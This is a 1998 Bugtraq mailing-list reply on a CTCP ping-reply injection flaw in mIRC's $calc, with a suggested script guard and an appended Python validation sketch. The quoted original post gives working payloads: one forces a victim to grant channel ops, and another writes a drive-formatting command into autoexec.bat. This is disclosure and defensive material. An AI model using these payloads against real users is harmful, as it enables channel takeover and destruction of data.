[7372] in bugtraq
Re: Backdoor in ircN, popular mIRC script.
daemon@ATHENA.MIT.EDU (Benoit Lefebvre)
Fri Jul 24 00:27:50 1998
Date: Thu, 23 Jul 1998 22:57:46 +0000
Reply-To: Benoit Lefebvre <mox@SHELLZ.NETREVOLUTION.COM>
From: Benoit Lefebvre <mox@SHELLZ.NETREVOLUTION.COM>
X-To: Nick Koscianski <kkr@engulf.com>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <35B7DC39.2F26@engulf.com>
The bug is not only in ircN
It is in mIRC.
The problem is $calc(..)
ircN is just one of the scripts that use $calc to check the ping delay
eg: on 1:CTCPREPLY:PING*: { echo -a Ping reply: $calc($ctime - $2) }
To protect yourself, add this to your script:
on 1:CTCPREPLY:PING*: { if ($2 !isnum) { halt } }
--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
___/ ___/ _____/ __/ __/ Benoit Lefebvre
____/ ____/ __/ __/ __/__/ MoxImages
__/___/__/ ___/ ___/ ___/ @shellz.netrevolution.com
__/ _/ __/ __/ __/ __/ __/ http://www.mox.qc.ca/
__/ __/ _____/ __/ __/ ICQ: 858084
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
On Thu, 23 Jul 1998, Nick Koscianski wrote:
> A backdoor has been found in ircN, possibly the most popular mIRC
> script. Using the command /ctcpreply, any user can make someone using
> the backdoored versions do whatever they want. For example:
> /ctcpreply Dianora ping $mode(#us-opers,+o,hax0r)
> will force Dianora to give ops to hax0r in #us-opers.
>
> Also, they can be forced to run arbitrary programs, for example:
>
> /ctcpreply Dianora $run(echo,"echo,y,|,format,c:\",>,c:\autoexec.bat)
> will format this person's hard drive..definitely not good.
>
> A bug fix for this problem can be found at http://www.vode.org/ircN
>
>
> -KKR
>
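
The numeric check suggested in the reply above, sketched in Python as an added example (not code from either poster, nor from mIRC or ircN). The function names, the 10-digit limit and the rejection of future timestamps are assumptions made for illustration. The reply token is handled as data only and is never passed to an evaluator.

```python
import re

CTCP_DELIM = "\x01"  # CTCP payloads are wrapped in 0x01 bytes inside a NOTICE

# ASCII digits only, bounded length. str.isdigit() and int() alone are too
# permissive: they accept Unicode digits, and int() also accepts "1_0".
_TIMESTAMP = re.compile(r"[0-9]{1,10}")


def parse_ctcp_reply(notice_text):
    """Return (command, args) for a CTCP reply payload, or None if malformed."""
    if len(notice_text) < 2:
        return None
    if not (notice_text.startswith(CTCP_DELIM) and notice_text.endswith(CTCP_DELIM)):
        return None
    body = notice_text[1:-1]
    if not body or CTCP_DELIM in body:
        return None
    command, _, args = body.partition(" ")
    return command.upper(), args


def ping_delay(notice_text, now):
    """Return the ping delay in seconds, or None if the reply is rejected.

    Mirrors the "if ($2 !isnum) { halt }" guard: the first argument must be
    a plain number before any arithmetic is done on it.
    """
    parsed = parse_ctcp_reply(notice_text)
    if parsed is None or parsed[0] != "PING":
        return None
    token = parsed[1].split(" ")[0]
    if not _TIMESTAMP.fullmatch(token):
        return None  # anything like "$mode(...)" stops here, unevaluated
    delay = now - int(token)
    return delay if delay >= 0 else None  # assumption: future stamps are bogus


if __name__ == "__main__":
    now = 901234567  # constructed sample clock value
    samples = [      # constructed replies; the second reuses the quoted payload
        "\x01PING 901234560\x01",
        "\x01PING $mode(#us-opers,+o,hax0r)\x01",
        "\x01PING 12abc\x01",
    ]
    for s in samples:
        print(repr(s), "->", ping_delay(s, now))
```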